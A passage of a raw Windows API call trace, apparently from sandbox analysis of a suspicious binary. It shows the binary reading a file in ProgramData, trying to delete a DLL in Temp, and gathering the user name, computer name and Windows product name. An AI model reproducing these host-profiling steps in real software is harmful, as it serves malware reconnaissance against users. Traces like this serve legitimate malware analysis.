hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8d8 | out: hHeap=0x4780000) returned 1 [0145.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e868 [0145.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8e8 | out: hHeap=0x4780000) returned 1 [0145.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x479e778 [0145.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e868 | out: hHeap=0x4780000) returned 1 [0145.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x478ba90 [0145.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e778 | out: hHeap=0x4780000) returned 1 [0145.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x478bac0 [0145.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ba90 | out: hHeap=0x4780000) returned 1 [0145.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x4798a90 [0145.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478bac0 | out: hHeap=0x4780000) returned 1 [0145.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x478ba90 [0145.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a2b8 [0145.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a2b8 | out: hHeap=0x4780000) returned 1 [0145.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798a90 | out: hHeap=0x4780000) returned 1 [0145.478] GetProcAddress (hModule=0x76720000, lpProcName="GetTempPathW") returned 0x76746b30 [0145.478] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0xdf30c | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0145.479] FreeLibrary (hLibModule=0x76720000) returned 1 [0145.479] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791e80 [0145.479] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a1a0 [0145.479] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a2e0 | out: hHeap=0x4780000) returned 1 [0145.480] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4791e80 | out: hHeap=0x4780000) returned 1 [0145.482] RtlUnwind (TargetFrame=0xdf51c, TargetIp=0x68a9edc6, ExceptionRecord=0xde904, ReturnValue=0x0) [0145.482] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x208) returned 0x479e928 [0145.482] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x479e928 | out: pszPath="C:\\ProgramData") returned 0x0 [0145.523] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a1f0 [0145.524] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a1f0 | out: hHeap=0x4780000) returned 1 [0145.524] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x479e858 [0145.524] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x479e868 [0145.524] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e858 | out: hHeap=0x4780000) returned 1 [0145.524] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x479e878 [0145.524] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e868 | out: hHeap=0x4780000) returned 1 [0145.524] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e908 [0145.524] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e878 | out: hHeap=0x4780000) returned 1 [0145.524] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x479e758 [0145.524] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e908 | out: hHeap=0x4780000) returned 1 [0145.524] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x478bb50 [0145.524] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e758 | out: hHeap=0x4780000) returned 1 [0145.524] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x478baf0 [0145.524] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478bb50 | out: hHeap=0x4780000) returned 1 [0145.524] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x4798cd0 [0145.524] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478baf0 | out: hHeap=0x4780000) returned 1 [0145.524] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x478baf0 [0145.524] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4799f20 [0145.525] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4799f20 | out: hHeap=0x4780000) returned 1 [0145.525] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798cd0 | out: hHeap=0x4780000) returned 1 [0145.525] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a330 [0145.525] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e828 [0145.525] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e818 [0145.526] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798d90 [0145.526] GetCurrentPackageId () returned 0x3d54 [0145.526] AreFileApisANSI () returned 1 [0145.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x479a330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0145.539] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x36) returned 0x4798eb8 [0145.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x479a330, cbMultiByte=-1, lpWideCharStr=0x4798eb8, cchWideChar=27 | out: lpWideCharStr="C:\\ProgramData\\Windose.txt") returned 27 [0145.540] CreateFileW (lpFileName="C:\\ProgramData\\Windose.txt" (normalized: "c:\\programdata\\windose.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xdf330, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0145.540] GetFileType (hFile=0x1fc) returned 0x1 [0145.541] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798eb8 | out: hHeap=0x4780000) returned 1 [0145.541] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xdf3e8 | out: lpNewFilePointer=0x0) returned 1 [0145.541] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xdf3e0 | out: lpNewFilePointer=0x0) returned 1 [0145.541] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x479e788 [0145.542] GetLastError () returned 0x0 [0145.542] SetLastError (dwErrCode=0x0) [0145.542] GetLastError () returned 0x0 [0145.542] SetLastError (dwErrCode=0x0) [0145.542] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0xb8) returned 0x4796ec8 [0145.542] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6a6) returned 0x479eb38 [0145.543] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479eb38 | out: hHeap=0x4780000) returned 1 [0145.543] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ffd0 | out: hHeap=0x4780000) returned 1 [0145.543] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4797ef0 | out: hHeap=0x4780000) returned 1 [0145.543] GetLastError () returned 0x0 [0145.543] SetLastError (dwErrCode=0x0) [0145.543] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x479e7b8 [0145.543] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x479e878 [0145.543] GetLastError () returned 0x0 [0145.543] SetLastError (dwErrCode=0x0) [0145.544] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x4) returned 0x479e808 [0145.544] GetLastError () returned 0x0 [0145.544] SetLastError (dwErrCode=0x0) [0145.544] GetLastError () returned 0x0 [0145.544] SetLastError (dwErrCode=0x0) [0145.544] GetLastError () returned 0x0 [0145.544] SetLastError (dwErrCode=0x0) [0145.544] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0xb8) returned 0x4797ef0 [0145.544] GetLastError () returned 0x0 [0145.544] SetLastError (dwErrCode=0x0) [0145.544] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6a6) returned 0x479eb38 [0145.544] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479eb38 | out: hHeap=0x4780000) returned 1 [0145.545] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7b8 | out: hHeap=0x4780000) returned 1 [0145.545] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4796ec8 | out: hHeap=0x4780000) returned 1 [0145.545] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e808 | out: hHeap=0x4780000) returned 1 [0145.545] GetLastError () returned 0x0 [0145.545] SetLastError (dwErrCode=0x0) [0145.545] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x479e8b8 [0145.545] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x479e8d8 [0145.545] GetLastError () returned 0x0 [0145.545] SetLastError (dwErrCode=0x0) [0145.545] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x4) returned 0x479e7d8 [0145.545] GetLastError () returned 0x0 [0145.545] SetLastError (dwErrCode=0x0) [0145.545] GetLastError () returned 0x0 [0145.545] SetLastError (dwErrCode=0x0) [0145.545] GetLastError () returned 0x0 [0145.546] SetLastError (dwErrCode=0x0) [0145.546] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0xb8) returned 0x4796ec8 [0145.546] GetLastError () returned 0x0 [0145.546] SetLastError (dwErrCode=0x0) [0145.546] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6a6) returned 0x479eb38 [0145.546] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479eb38 | out: hHeap=0x4780000) returned 1 [0145.546] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8b8 | out: hHeap=0x4780000) returned 1 [0145.547] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4797ef0 | out: hHeap=0x4780000) returned 1 [0145.547] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7d8 | out: hHeap=0x4780000) returned 1 [0145.547] GetLastError () returned 0x0 [0145.547] SetLastError (dwErrCode=0x0) [0145.547] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x479e888 [0145.547] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8d8 | out: hHeap=0x4780000) returned 1 [0145.547] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e878 | out: hHeap=0x4780000) returned 1 [0145.547] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x479e8e8 [0145.547] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xdf3d0 | out: lpNewFilePointer=0x0) returned 1 [0145.548] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xde3ac | out: lpNewFilePointer=0x0) returned 1 [0145.548] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1000) returned 0x479eb38 [0145.548] ReadFile (in: hFile=0x1fc, lpBuffer=0x479eb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdf3d0, lpOverlapped=0x0 | out: lpBuffer=0x479eb38*, lpNumberOfBytesRead=0xdf3d0*=0x58, lpOverlapped=0x0) returned 1 [0145.549] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a1f0 [0145.549] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478fe40 [0145.549] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a1f0 | out: hHeap=0x4780000) returned 1 [0145.549] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x47) returned 0x4792520 [0145.549] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478fe40 | out: hHeap=0x4780000) returned 1 [0145.549] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6a) returned 0x478b990 [0145.550] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4792520 | out: hHeap=0x4780000) returned 1 [0145.550] ReadFile (in: hFile=0x1fc, lpBuffer=0x479eb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdf3d0, lpOverlapped=0x0 | out: lpBuffer=0x479eb38*, lpNumberOfBytesRead=0xdf3d0*=0x0, lpOverlapped=0x0) returned 1 [0145.550] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x478ae28 [0145.551] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479eb38 | out: hHeap=0x4780000) returned 1 [0145.551] CloseHandle (hObject=0x1fc) returned 1 [0145.551] Sleep (dwMilliseconds=0x3e8) [0146.588] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x479a330, cbMultiByte=26, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0146.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x40) returned 0x47901c0 [0146.588] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x479a330, cbMultiByte=26, lpWideCharStr=0x47901c0, cchWideChar=26 | out: lpWideCharStr="C:\\ProgramData\\Windose.txt") returned 26 [0146.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x479e8f8 [0146.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x479e858 [0146.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8f8 | out: hHeap=0x4780000) returned 1 [0146.588] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x479e898 [0146.588] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e858 | out: hHeap=0x4780000) returned 1 [0146.589] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e7e8 [0146.589] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e898 | out: hHeap=0x4780000) returned 1 [0146.589] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x479e898 [0146.589] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7e8 | out: hHeap=0x4780000) returned 1 [0146.590] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x478bb50 [0146.590] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e898 | out: hHeap=0x4780000) returned 1 [0146.590] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x479ee38 [0146.590] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478bb50 | out: hHeap=0x4780000) returned 1 [0146.590] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x4798dd0 [0146.590] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ee38 | out: hHeap=0x4780000) returned 1 [0146.590] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x479a1f0 [0146.590] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798dd0 | out: hHeap=0x4780000) returned 1 [0146.590] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x478fe40 [0146.590] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a1f0 | out: hHeap=0x4780000) returned 1 [0146.590] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3f) returned 0x4790640 [0146.591] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478fe40 | out: hHeap=0x4780000) returned 1 [0146.591] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x5e) returned 0x4797ef0 [0146.591] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4790640 | out: hHeap=0x4780000) returned 1 [0146.591] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x40) returned 0x4790328 [0146.591] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791ab8 [0146.592] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4797ef0 | out: hHeap=0x4780000) returned 1 [0146.592] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ae28 | out: hHeap=0x4780000) returned 1 [0146.592] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x4791ab8, cbMultiByte=64, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0146.592] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x90) returned 0x478ae28 [0146.592] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x4791ab8, cbMultiByte=64, lpWideCharStr=0x478ae28, cchWideChar=64 | out: lpWideCharStr="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wnitmpo.dll") returned 64 [0146.593] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47901c0 | out: hHeap=0x4780000) returned 1 [0146.593] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wnitmpo.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\wnitmpo.dll")) returned 0 [0146.595] GetUserNameW (in: lpBuffer=0xdf314, pcbBuffer=0xdf10c | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0xdf10c) returned 1 [0146.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a268 [0146.602] GetComputerNameW (in: lpBuffer=0xdf114, nSize=0xdf110 | out: lpBuffer="XC64ZB", nSize=0xdf110) returned 1 [0146.602] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478cfc8 [0146.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a268 | out: hHeap=0x4780000) returned 1 [0146.603] GetLastError () returned 0xcb [0146.603] SetLastError (dwErrCode=0xcb) [0146.603] GetLastError () returned 0xcb [0146.603] SetLastError (dwErrCode=0xcb) [0146.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478d038 [0146.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478ccf0 [0146.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791e80 [0146.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478cfc8 | out: hHeap=0x4780000) returned 1 [0146.624] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ccf0 | out: hHeap=0x4780000) returned 1 [0146.624] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478d038 | out: hHeap=0x4780000) returned 1 [0146.624] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478cfc8 [0146.624] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791b10 [0146.625] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478cfc8 | out: hHeap=0x4780000) returned 1 [0146.625] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x479e7f8 [0146.625] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x479e838 [0146.625] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7f8 | out: hHeap=0x4780000) returned 1 [0146.625] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x479e908 [0146.625] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e838 | out: hHeap=0x4780000) returned 1 [0146.625] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e8c8 [0146.625] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e908 | out: hHeap=0x4780000) returned 1 [0146.625] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x479e8b8 [0146.625] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8c8 | out: hHeap=0x4780000) returned 1 [0146.625] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x479ed48 [0146.625] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8b8 | out: hHeap=0x4780000) returned 1 [0146.625] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x479ec88 [0146.625] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ed48 | out: hHeap=0x4780000) returned 1 [0146.625] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x4798bd0 [0146.625] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ec88 | out: hHeap=0x4780000) returned 1 [0146.625] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x479a268 [0146.625] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798bd0 | out: hHeap=0x4780000) returned 1 [0146.625] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x478cfc8 [0146.625] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a268 | out: hHeap=0x4780000) returned 1 [0146.625] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3f) returned 0x4790400 [0146.626] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478cfc8 | out: hHeap=0x4780000) returned 1 [0146.626] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478d038 [0146.626] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x40) returned 0x4790520 [0146.626] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478cfc8 [0146.626] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4790520 | out: hHeap=0x4780000) returned 1 [0146.626] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4790400 | out: hHeap=0x4780000) returned 1 [0146.626] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x4797ef0 [0146.627] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0xdee2c | out: phkResult=0xdee2c*=0x218) returned 0x0 [0146.627] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x479e908 [0146.627] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x479e898 [0146.627] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e908 | out: hHeap=0x4780000) returned 1 [0146.627] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x479e8f8 [0146.627] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e898 | out: hHeap=0x4780000) returned 1 [0146.627] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x479e908 [0146.627] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8f8 | out: hHeap=0x4780000) returned 1 [0146.627] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x479e838 [0146.627] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e908 | out: hHeap=0x4780000) returned 1 [0146.627] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x479edd8 [0146.627] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e838 | out: hHeap=0x4780000) returned 1 [0146.627] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x479ed78 [0146.627] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479edd8 | out: hHeap=0x4780000) returned 1 [0146.627] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x4798a90 [0146.627] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ed78 | out: hHeap=0x4780000) returned 1 [0146.628] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x479ece8 [0146.628] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a268 [0146.628] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a268 | out: hHeap=0x4780000) returned 1 [0146.628] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798a90 | out: hHeap=0x4780000) returned 1 [0146.628] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a268 [0146.628] RegQueryValueExW (in: hKey=0x218, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0xdeeac, lpcbData=0xdeea8*=0x400 | out: lpType=0x0, lpData=0xdeeac*=0x57, lpcbData=0xdeea8*=0x1e) returned 0x0 [0146.628] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4799f20 [0146.628] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a268 | out: hHeap=0x4780000) returned 1 [0146.629] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4797ef0 | out: hHeap=0x4780000) returned 1 [0146.629] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478cfc8 | out: hHeap=0x4780000) returned 1 [0146.629] GetUserNameW (in: lpBuffer=0xdf0ac, pcbBuffer=0xdeea4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0xdeea4) returned 1 [0146.629] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x479a268 [0146.629] GetComputerNameW (in: lpBuffer=0xdeeac, nSize=0xdeea8 | out: lpBuffer="XC64ZB", nSize=0xdeea8) returned 1 [0146.629] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478ccf0 [0146.630] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a268 | out: hHeap=0x4780000) returned 1 [0146.630] GetLastError () returned 0xcb [0146.630] SetLastError (dwErrCode=0xcb) [0146.630] GetLastError () returned 0xcb [0146.630] SetLastError (dwErrCode=0xcb) [0146.630] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478cfc8 [0146.630] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x478fe40 [0146.630] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50) returned 0x4791bc0 [0146.630] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ccf0 | out: hHeap=0x4780000) returned 1 [0146.630] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478fe40 | out: hHeap=0x4780000) returned 1 [0146.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x478cfc8 | out: hHeap=0x4780000) returned 1 [0146.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x479e798 [0146.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x479e7f8 [0146.631] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e798 | out: hHeap=0x4780000) returned 1 [0146.631] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x479e758 [0146.631] HeapFree (in: 